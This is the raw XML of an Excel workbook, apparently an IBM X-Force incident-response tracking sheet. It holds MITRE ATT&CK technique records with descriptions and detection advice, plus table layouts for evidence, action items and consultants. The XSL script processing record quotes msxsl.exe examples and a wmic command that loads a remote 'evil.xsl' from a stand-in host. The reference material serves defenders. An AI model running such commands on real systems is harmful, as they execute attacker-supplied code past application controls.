    <s v="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_x000a__x000a_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_x000a__x000a_In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)"/>
    <s v="https://attack.mitre.org/techniques/T1125"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="7"/>
    <s v="Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system._x000a__x000a_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
    <s v="Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1497"/>
    <x v="539"/>
    <s v="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_x000a__x000a_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_x000a__x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1497"/>
    <d v="2019-04-17T00:00:00"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="1.2"/>
    <x v="29"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Deloitte Threat Library Team; Sunny Neo"/>
    <m/>
    <s v="Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1497.001"/>
    <x v="540"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. _x000a__x000a_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_x000a_ _x000a_Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)"/>
    <s v="https://attack.mitre.org/techniques/T1497/001"/>
    <d v="2020-03-06T00:00:00"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="2"/>
    <x v="29"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1497"/>
    <s v="Deloitte Threat Library Team"/>
    <m/>
    <s v="Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1497.003"/>
    <x v="541"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1497/003"/>
    <d v="2020-03-06T00:00:00"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="29"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1497"/>
    <s v="Deloitte Threat Library Team"/>
    <m/>
    <s v="Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1497.002"/>
    <x v="542"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1497/002"/>
    <d v="2020-03-06T00:00:00"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="1"/>
    <x v="29"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1497"/>
    <s v="Deloitte Threat Library Team"/>
    <m/>
    <s v="Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1600"/>
    <x v="543"/>
    <s v="Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1600"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Network"/>
    <s v="File: File Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="Encryption"/>
    <m/>
  </r>
  <r>
    <s v="T1600.002"/>
    <x v="544"/>
    <s v="Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1600/002"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Network"/>
    <s v="File: File Modification"/>
    <b v="1"/>
    <s v="T1600"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1600.001"/>
    <x v="545"/>
    <s v="Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1600/001"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Network"/>
    <s v="File: File Modification"/>
    <b v="1"/>
    <s v="T1600"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1102"/>
    <x v="546"/>
    <s v="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_x000a__x000a_Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed)."/>
    <s v="https://attack.mitre.org/techniques/T1102"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1.100000000000000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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Anastasios Pingios"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1102.002"/>
    <x v="547"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1102/002"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1102"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1102.001"/>
    <x v="548"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed)."/>
    <s v="https://attack.mitre.org/techniques/T1102/001"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1102"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1102.003"/>
    <x v="549"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1102/003"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1102"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1047"/>
    <x v="550"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1047"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="13"/>
    <s v="Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of &quot;wmic&quot; and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)"/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1220"/>
    <x v="551"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)_x000a__x000a_* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;_x000a_* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;_x000a_* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;_x000a__x000a_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quot;Squiblydoo&quot; counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)_x000a__x000a_Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)_x000a__x000a_* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;_x000a_* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;"/>
    <s v="https://attack.mitre.org/techniques/T1220"/>
    <d v="2018-10-17T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1.2"/>
    <x v="12"/>
    <s v="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_x000a__x000a_The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious."/>
    <s v="Windows"/>
    <s v="Module: Module Load, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Avneet Singh; Casey Smith; Praetorian"/>
    <m/>
    <s v="Anti-virus, Application control, Digital Certificate Validatio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D1D2BC-9073-4FF7-912B-B670CCCEFEBA}" name="MITRETechniques_PivotTable" cacheId="8461" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" tag="03d36201-b6e7-4330-97fe-97c390fa9337" updatedVersion="6" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="6" indent="0" outline="1" outlineData="1" multipleFieldFilters="0" rowHeaderCaption="Techniques">
  <location ref="B558:B745" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="2">
    <pivotField axis="axisRow" allDrilled="1" subtotalTop="0" showAll="0" dataSourceSort="1" defaultSubtotal="0" defaultAttributeDrillState="1">
      <items count="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s>
    </pivotField>
    <pivotField axis="axisRow" allDrilled="1" subtotalTop="0" showAll="0" dataSourceSort="1" defaultSubtotal="0" defaultAttributeDrillState="1">
      <items count="1">
        <item s="1" x="0"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="2">
    <field x="1"/>
    <field x="0"/>
  </rowFields>
  <rowItems count="187">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t="grand">
      <x/>
    </i>
  </rowItem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7" showRowHeaders="1" showColHeaders="1" showRowStripes="0" showColStripes="0" showLastColumn="1"/>
  <rowHierarchiesUsage count="2">
    <rowHierarchyUsage hierarchyUsage="29"/>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BM X-Force IR Engagement Tracking Sheet - Carbon.xlsx!MT">
        <x15:activeTabTopLevelEntity name="[M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CCC96D-371F-4986-AE89-EF0F4BFF057B}" name="PivotTable1" cacheId="84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btechniques">
  <location ref="C558:C624" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="17">
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="5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6"/>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35"/>
        <item x="136"/>
        <item x="137"/>
        <item x="138"/>
        <item x="139"/>
        <item x="140"/>
        <item x="141"/>
        <item x="142"/>
        <item x="143"/>
        <item x="144"/>
        <item x="123"/>
        <item x="124"/>
        <item x="125"/>
        <item x="126"/>
        <item x="127"/>
        <item x="128"/>
        <item x="129"/>
        <item x="130"/>
        <item x="131"/>
        <item x="132"/>
        <item x="133"/>
        <item x="13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6"/>
        <item x="277"/>
        <item x="278"/>
        <item x="275"/>
        <item x="279"/>
        <item x="280"/>
        <item x="281"/>
        <item x="282"/>
        <item x="283"/>
        <item x="284"/>
        <item x="285"/>
        <item x="286"/>
        <item x="287"/>
        <item x="288"/>
        <item x="289"/>
        <item x="290"/>
        <item x="291"/>
        <item x="292"/>
        <item x="293"/>
        <item x="294"/>
        <item x="295"/>
        <item x="296"/>
        <item x="300"/>
        <item x="297"/>
        <item x="298"/>
        <item x="299"/>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48"/>
        <item x="349"/>
        <item x="350"/>
        <item x="351"/>
        <item x="352"/>
        <item x="353"/>
        <item x="354"/>
        <item x="355"/>
        <item x="356"/>
        <item x="357"/>
        <item x="358"/>
        <item x="359"/>
        <item x="360"/>
        <item x="361"/>
        <item x="362"/>
        <item x="363"/>
        <item x="364"/>
        <item x="365"/>
        <item x="366"/>
        <item x="367"/>
        <item x="339"/>
        <item x="340"/>
        <item x="341"/>
        <item x="342"/>
        <item x="343"/>
        <item x="344"/>
        <item x="345"/>
        <item x="346"/>
        <item x="34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40"/>
        <item x="439"/>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8"/>
        <item x="479"/>
        <item x="480"/>
        <item x="481"/>
        <item x="482"/>
        <item x="477"/>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t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField numFmtId="14" showAll="0"/>
    <pivotField numFmtId="14" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0">
      <items count="31">
        <item h="1" x="7"/>
        <item h="1" x="20"/>
        <item h="1" x="6"/>
        <item h="1" x="26"/>
        <item h="1" x="11"/>
        <item h="1" x="21"/>
        <item h="1" x="22"/>
        <item h="1" x="12"/>
        <item h="1" x="29"/>
        <item h="1" x="14"/>
        <item h="1" x="28"/>
        <item h="1" x="27"/>
        <item h="1" x="9"/>
        <item h="1" x="19"/>
        <item h="1" x="0"/>
        <item h="1" x="2"/>
        <item h="1" x="13"/>
        <item h="1" x="25"/>
        <item h="1" x="24"/>
        <item h="1" x="8"/>
        <item h="1" x="1"/>
        <item h="1" x="15"/>
        <item h="1" x="23"/>
        <item h="1" x="18"/>
        <item h="1" x="17"/>
        <item x="3"/>
        <item x="10"/>
        <item h="1" x="16"/>
        <item h="1" x="5"/>
        <item h="1" x="4"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
  </pivotFields>
  <rowFields count="1">
    <field x="1"/>
  </rowFields>
  <rowItems count="66">
    <i>
      <x v="17"/>
    </i>
    <i>
      <x v="18"/>
    </i>
    <i>
      <x v="19"/>
    </i>
    <i>
      <x v="20"/>
    </i>
    <i>
      <x v="21"/>
    </i>
    <i>
      <x v="47"/>
    </i>
    <i>
      <x v="48"/>
    </i>
    <i>
      <x v="49"/>
    </i>
    <i>
      <x v="50"/>
    </i>
    <i>
      <x v="51"/>
    </i>
    <i>
      <x v="52"/>
    </i>
    <i>
      <x v="53"/>
    </i>
    <i>
      <x v="54"/>
    </i>
    <i>
      <x v="55"/>
    </i>
    <i>
      <x v="56"/>
    </i>
    <i>
      <x v="57"/>
    </i>
    <i>
      <x v="58"/>
    </i>
    <i>
      <x v="59"/>
    </i>
    <i>
      <x v="60"/>
    </i>
    <i>
      <x v="61"/>
    </i>
    <i>
      <x v="62"/>
    </i>
    <i>
      <x v="63"/>
    </i>
    <i>
      <x v="64"/>
    </i>
    <i>
      <x v="65"/>
    </i>
    <i>
      <x v="66"/>
    </i>
    <i>
      <x v="67"/>
    </i>
    <i>
      <x v="69"/>
    </i>
    <i>
      <x v="93"/>
    </i>
    <i>
      <x v="103"/>
    </i>
    <i>
      <x v="104"/>
    </i>
    <i>
      <x v="105"/>
    </i>
    <i>
      <x v="106"/>
    </i>
    <i>
      <x v="107"/>
    </i>
    <i>
      <x v="108"/>
    </i>
    <i>
      <x v="109"/>
    </i>
    <i>
      <x v="110"/>
    </i>
    <i>
      <x v="111"/>
    </i>
    <i>
      <x v="184"/>
    </i>
    <i>
      <x v="185"/>
    </i>
    <i>
      <x v="186"/>
    </i>
    <i>
      <x v="187"/>
    </i>
    <i>
      <x v="188"/>
    </i>
    <i>
      <x v="189"/>
    </i>
    <i>
      <x v="190"/>
    </i>
    <i>
      <x v="191"/>
    </i>
    <i>
      <x v="192"/>
    </i>
    <i>
      <x v="193"/>
    </i>
    <i>
      <x v="194"/>
    </i>
    <i>
      <x v="195"/>
    </i>
    <i>
      <x v="196"/>
    </i>
    <i>
      <x v="197"/>
    </i>
    <i>
      <x v="198"/>
    </i>
    <i>
      <x v="199"/>
    </i>
    <i>
      <x v="281"/>
    </i>
    <i>
      <x v="352"/>
    </i>
    <i>
      <x v="353"/>
    </i>
    <i>
      <x v="354"/>
    </i>
    <i>
      <x v="355"/>
    </i>
    <i>
      <x v="356"/>
    </i>
    <i>
      <x v="357"/>
    </i>
    <i>
      <x v="358"/>
    </i>
    <i>
      <x v="447"/>
    </i>
    <i>
      <x v="448"/>
    </i>
    <i>
      <x v="449"/>
    </i>
    <i>
      <x v="450"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colItems count="1">
    <i/>
  </colItem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F12BD79-651E-4850-B572-46D3D4C940DD}" autoFormatId="16" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="0">
  <queryTableRefresh nextId="18">
    <queryTableFields count="17">
      <queryTableField id="1" name="ID" tableColumnId="1"/>
      <queryTableField id="2" name="name" tableColumnId="2"/>
      <queryTableField id="3" name="description" tableColumnId="3"/>
      <queryTableField id="4" name="url" tableColumnId="4"/>
      <queryTableField id="5" name="created" tableColumnId="5"/>
      <queryTableField id="6" name="last modified" tableColumnId="6"/>
      <queryTableField id="7" name="version" tableColumnId="7"/>
      <queryTableField id="8" name="tactics" tableColumnId="8"/>
      <queryTableField id="9" name="detection" tableColumnId="9"/>
      <queryTableField id="10" name="platforms" tableColumnId="10"/>
      <queryTableField id="11" name="data sources" tableColumnId="11"/>
      <queryTableField id="12" name="is sub-technique" tableColumnId="12"/>
      <queryTableField id="13" name="sub-technique of" tableColumnId="13"/>
      <queryTableField id="14" name="contributors" tableColumnId="14"/>
      <queryTableField id="15" name="permissions required" tableColumnId="15"/>
      <queryTableField id="16" name="defenses bypassed" tableColumnId="16"/>
      <queryTableField id="17" name="supports remote" tableColumnId="17"/>
    </queryTable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sub_technique" xr10:uid="{2993BB58-C52A-400D-B5D9-C0E8BA7F3EE4}" sourceName="[MT].[is sub-technique]">
  <pivotTables>
    <pivotTable tabId="18" name="MITRETechniques_PivotTable"/>
  </pivotTables>
  <data>
    <olap pivotCacheId="2089231100">
      <levels count="2">
        <level uniqueName="[MT].[is sub-technique].[(All)]" sourceCaption="(All)" count="0"/>
        <level uniqueName="[MT].[is sub-technique].[is sub-technique]" sourceCaption="is sub-technique" count="3">
          <ranges>
            <range startItem="0">
              <i n="[MT].[is sub-technique].&amp;[False]" c="FALSE"/>
              <i n="[MT].[is sub-technique].&amp;[True]" c="TRUE"/>
              <i n="[MT].[is sub-technique].&amp;" c="(blank)"/>
            </range>
          </ranges>
        </level>
      </levels>
      <selections count="1">
        <selection n="[MT].[is sub-technique].&amp;[Fals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ctics" xr10:uid="{9F12BBD7-09C0-46F1-B1D3-2054E38EAED6}" sourceName="tactics">
  <pivotTables>
    <pivotTable tabId="18" name="PivotTable1"/>
  </pivotTables>
  <data>
    <tabular pivotCacheId="680759614">
      <items count="30">
        <i x="7"/>
        <i x="20"/>
        <i x="6"/>
        <i x="26"/>
        <i x="11"/>
        <i x="21"/>
        <i x="22"/>
        <i x="12"/>
        <i x="29"/>
        <i x="14"/>
        <i x="28"/>
        <i x="27"/>
        <i x="9"/>
        <i x="19"/>
        <i x="0"/>
        <i x="2"/>
        <i x="13"/>
        <i x="25"/>
        <i x="24"/>
        <i x="8"/>
        <i x="1"/>
        <i x="15"/>
        <i x="23"/>
        <i x="18"/>
        <i x="17"/>
        <i x="3" s="1"/>
        <i x="10" s="1"/>
        <i x="16"/>
        <i x="5"/>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 sub-technique" xr10:uid="{A5AA52B5-9670-4066-844D-210E1E5BF827}" cache="Slicer_is_sub_technique" caption="is sub-technique" level="1" rowHeight="257175"/>
  <slicer name="tactics" xr10:uid="{45C7C35E-FCCC-4C82-9160-D77209405E39}" cache="Slicer_tactics" caption="tactics" rowHeight="273050"/>
</slicers>
</file>

<file path=xl/tables/_rels/table1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CaseSummary" displayName="CaseSummary" ref="A3:F9" totalsRowShown="0" totalsRowBorderDxfId="263" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A3:F9" xr:uid="{00000000-0009-0000-0100-000007000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="Info" dataDxfId="261" totalsRowDxfId="262" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="Event Date (UTC)" dataDxfId="259" totalsRowDxfId="260" dataCellStyle="Normal"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="Date Added" dataDxfId="257" totalsRowDxfId="258" dataCellStyle="Normal"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="Date Updated" dataDxfId="255" totalsRowDxfId="256" dataCellStyle="Normal"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="Data" totalsRowDxfId="254" dataCellStyle="Normal"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="Data Details" totalsRowDxfId="253" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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5F34CF9-D232-4A7A-B048-7BC40CD8EFBF}" name="Table207" displayName="Table207" ref="A12:E17" totalsRowCount="1" totalsRowDxfId="252" totalsRowBorderDxfId="251">
  <autoFilter ref="A12:E16" xr:uid="{520BCF6C-CFFA-48BE-8CD2-9B33D2454838}"/>
  <tableColumns count="5">
    <tableColumn id="1" xr3:uid="{71B26B4E-A899-4A9B-8285-F1C37AEADBDD}" name="Consultant Name" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" totalsRowDxfId="250"/>
    <tableColumn id="2" xr3:uid="{1D398147-DF43-4024-A323-7A1C5840D111}" name="Consultant Role" totalsRowDxfId="249"/>
    <tableColumn id="3" xr3:uid="{9FB9A6FC-08A6-47FE-A27B-344785443E4A}" name="Email Address" totalsRowDxfId="248"/>
    <tableColumn id="4" xr3:uid="{E6CCC9CA-15E5-4099-A731-7AE52D5409B1}" name="Phone Number" totalsRowDxfId="247"/>
    <tableColumn id="5" xr3:uid="{5873D3F3-692F-45FF-8099-3A03037BB365}" name="Timezone (UTC)" totalsRowDxfId="246"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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ActionItems" displayName="ActionItems" ref="A1:K26" totalsRowCount="1" totalsRowDxfId="235" totalsRowBorderDxfId="234" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:K25" xr:uid="{00000000-0009-0000-0100-000008000000}"/>
  <tableColumns count="11">
    <tableColumn id="9" xr3:uid="{9589A9C4-F2FA-41EE-AEA5-875C7722DC87}" name="Action Item ID" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" totalsRowDxfId="233" dataCellStyle="Normal"/>
    <tableColumn id="10" xr3:uid="{C574254F-4360-4CC5-9BB8-D50AA01F9998}" name="Date added" dataDxfId="231" totalsRowDxfId="232" dataCellStyle="Normal"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0100-000002000000}" name="Added by" totalsRowDxfId="230" dataCellStyle="Normal"/>
    <tableColumn id="11" xr3:uid="{00DDDF02-0745-4CAF-B0E5-E2672EBCDF0F}" name="Status" totalsRowDxfId="229" dataCellStyle="Normal"/>
    <tableColumn id="16" xr3:uid="{7C339203-F5C7-46C1-9073-5C9A36AFC8DE}" name="Owner" totalsRowDxfId="228" dataCellStyle="Normal"/>
    <tableColumn id="12" xr3:uid="{2AD49B3A-D538-4ED2-9167-E3E5E2B8913F}" name="Due date" dataDxfId="226" totalsRowDxfId="227" dataCellStyle="Normal"/>
    <tableColumn id="13" xr3:uid="{06C4587E-7762-456B-9373-59C4F7B767E4}" name="Date completed" dataDxfId="224" totalsRowDxfId="225" dataCellStyle="Normal"/>
    <tableColumn id="14" xr3:uid="{6A561B75-5ECC-460D-AD79-97E344A7D0C2}" name="Priority" totalsRowDxfId="223" dataCellStyle="Normal"/>
    <tableColumn id="15" xr3:uid="{819704B8-08CE-439B-AF30-0C1BDEA8E998}" name="Requestor" totalsRowDxfId="222" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0100-000003000000}" name="Action" totalsRowDxfId="221" dataCellStyle="Normal"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0100-000006000000}" name="Notes" totalsRowDxfId="220" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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Evidence" displayName="Evidence" ref="A1:S30" totalsRowCount="1" totalsRowDxfId="205" totalsRowBorderDxfId="204" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:S29" xr:uid="{00000000-0009-0000-0100-000002000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:S23">
    <sortCondition ref="A1:A23"/>
  </sortState>
  <tableColumns count="19">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0200-000001000000}" name="Hostname" totalsRowLabel="Insert Additional Data Above This Row (CTRL SHIFT +)" totalsRowDxfId="203" dataCellStyle="Normal"/>
    <tableColumn id="16" xr3:uid="{A5254200-0A7B-4D46-AB79-8A170D6412EF}" name="Date Added" dataDxfId="201" totalsRowDxfId="202" dataCellStyle="Normal"/>
    <tableColumn id="26" xr3:uid="{54752E65-4117-44AF-A2D9-8DAFF9A123D5}" name="Added By" totalsRowDxfId="200" dataCellStyle="Normal"/>
    <tableColumn id="23" xr3:uid="{A8BBD602-E412-4A9A-AAE9-B4704A67C468}" name="Type" totalsRowDxfId="199" dataCellStyle="Normal"/>
    <tableColumn id="24" xr3:uid="{45B53F77-ECA7-497F-B3A0-CC406C965E5F}" name="Status" totalsRowDxfId="198" dataCellStyle="Normal"/>
    <tableColumn id="25" xr3:uid="{6600C710-FC52-483D-B8AA-A676692CF3E6}" name="Evidence Tag" totalsRowDxfId="197" dataCellStyle="Normal"/>
    <tableColumn id="17" xr3:uid="{B2CF6FFB-A814-4BDE-BB2C-5F9E10B326FC}" name="OS" dataDxfId="195" totalsRowDxfId="196" dataCellStyle="Normal">
      <calculatedColumnFormula>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="7" xr3:uid="{12189C8F-00D3-4945-8830-42D41211FB2F}" name="Priority" dataDxfId="193" totalsRowDxfId="194"/>
    <tableColumn id="19" xr3:uid="{B79AFBC4-648E-4469-A7BC-AB202D57A610}" name="Analyst" totalsRowDxfId="192" dataCellStyle="Normal"/>
    <tableColumn id="27" xr3:uid="{466CBF22-B733-466D-93B6-FF22AEE083DE}" name="Collection Date" dataDxfId="190" totalsRowDxfId="191" dataCellStyle="Normal"/>
    <tableColumn id="20" xr3:uid="{9CA81074-F3A8-4662-9698-4CC89E931EB9}" name="Received Date" dataDxfId="188" totalsRowDxfId="189" dataCellStyle="Normal"/>
    <tableColumn id="4" xr3:uid="{4F364D21-3BE5-4F0D-B2CD-0A3C88A40479}" name="Received by" totalsRowDxfId="187" dataCellStyle="Normal"/>
    <tableColumn id="2" xr3:uid="{BCFA61D4-B418-4048-91AA-80275B98CD3D}" name="Verified by" totalsRowDxfId="186" dataCellStyle="Normal"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0200-000009000000}" name="Data Location" totalsRowDxfId="185" dataCellStyle="Normal"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0200-000003000000}" name="Image Name" totalsRowDxfId="184" dataCellStyle="Normal"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0200-000005000000}" name="Acquisition MD5" totalsRowDxfId="183" dataCellStyle="Normal"/>
    <tableColumn id="6" xr3:uid="{CA413D6C-E567-4D33-BAF8-1F9E442F4CA6}" name="Acquisition SHA1" totalsRowDxfId="182" dataCellStyle="Normal"/>
    <tableColumn id="21" xr3:uid="{8F64F0EB-A6E7-492D-91EF-89CECFCB7E08}" name="Encryption key" totalsRowDxfId="181" dataCellStyle="Normal"/>
    <tableColumn id="14" xr3:uid="{00000000-0010-0000-0200-00000E000000}" name="Notes" totalsRowDxfId="180" dataCellStyle="Normal"/>
  </tableColumns>
  <tableStyleInfo name="IBM Security Table (Light)"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SystemOfInterest" displayName="SystemOfInterest" ref="A1:N26" totalsRowCount="1" totalsRowDxfId="168" totalsRowBorderDxfId="167" headerRowCellStyle="Normal" dataCellStyle="Normal" totalsRowCellStyle="Normal">
  <autoFilter ref="A1:N25" xr:uid="{00000000-0009-0000-0100-000004000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:N25">
    <sortCondition ref="A1:A26"/>
  </sortState>
  <tableColumns count="14">
